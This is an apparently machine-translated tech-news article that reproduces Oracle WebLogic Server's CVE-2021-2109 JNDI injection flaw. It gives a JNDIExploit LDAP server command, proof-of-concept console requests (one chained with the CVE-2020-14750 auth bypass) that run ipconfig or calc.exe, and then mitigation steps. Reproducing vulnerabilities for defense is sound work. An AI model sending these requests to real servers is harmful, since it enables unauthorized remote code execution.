Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about how to reproduce and analyze the Weblogic Server remote code execution vulnerability CVE-2021-2109. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Oracle released security update patches in January 2021, including 329 new security patches in the Oracle product line. This announcement specifically mentions Oracle WebLogic Server's security bulletin on the CVE-2020-14750 vulnerability issued on November 1, 2020. It is strongly recommended that customers apply this patch update, as well as other patches in this announcement. The CVE number is CVE-2021-2109, which is a remote code execution vulnerability of Weblogic. The vulnerability is mainly injected by JNDI, which can be exploited by an attacker for remote code execution.

The affected versions are as follows:

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

1. CVE-2021-2109 Weblogic Server remote code execution vulnerability recurrence

Use DOCKER to build a Weblogic Server test environment, and Weblogic Server can access it normally.

1. Perform JNDI injection when logging in to the backend normally

In the first case, you need to log in to the Weblogic Server backend using the administrator account, grab the login packet through BurpSuite, and obtain the login Cookie data.

Start LDAP locally and download it from https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. The command is as follows:

Java-jar JNDIExploit-v1.11.jar-I 192.168.131.1

Send Weblogic Server remote code execution vulnerability CVE-2021-2109 JNDI injection POC packet:

POST / console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle (% 22ldapblog _

Execute ipconfig system commands through the cmd variable

2. Cooperate with Weblogic Server unauthorized access to backend for JNDI injection

In the second case, you do not need to log in to the Weblogic Server background.

To cooperate with Weblogic Server CVE-2020-14750 unauthorized access vulnerability, send Weblogic Server remote code execution vulnerability CVE-2021-2109 JNDI injection POC packet:

POST / console/css/%25%32%65%25%32%65%25%32%66/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&cqqhandle=com.bea.console.handles.JndiBindingHandle (% 22ldapblog _

Execute calc.exe through the cmd variable to open the system calculator

II. Security recommendations for CVE-2021-2109 Weblogic Server remote code execution vulnerabilities

1. Disable T3 protocol

If you do not rely on the T3 protocol for JVM communication, you can mitigate the impact of this vulnerability by temporarily blocking the T3 protocol.

1)。 Go to the Weblogic console, on the base_domain configuration page, go to the "Security" tab page, click "filter" and configure the filter.

2)。 Enter: weblogic.security.net.ConnectionFilterImpl in the connection filter and * * 7001 deny T3 T3 in the connection filter rule box.

2. Disable enabling IIOP

Log in to the Weblogic console, find the option to enable IIOP, uncheck it, and the restart takes effect.

3. Temporarily close the backend / console/console.portal external access

4. Upgrade the official security patch

The above is the editor for you to share how to carry out Weblogic Server remote code execution vulnerability CVE-2021-2109 reproduction and analysis, if you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.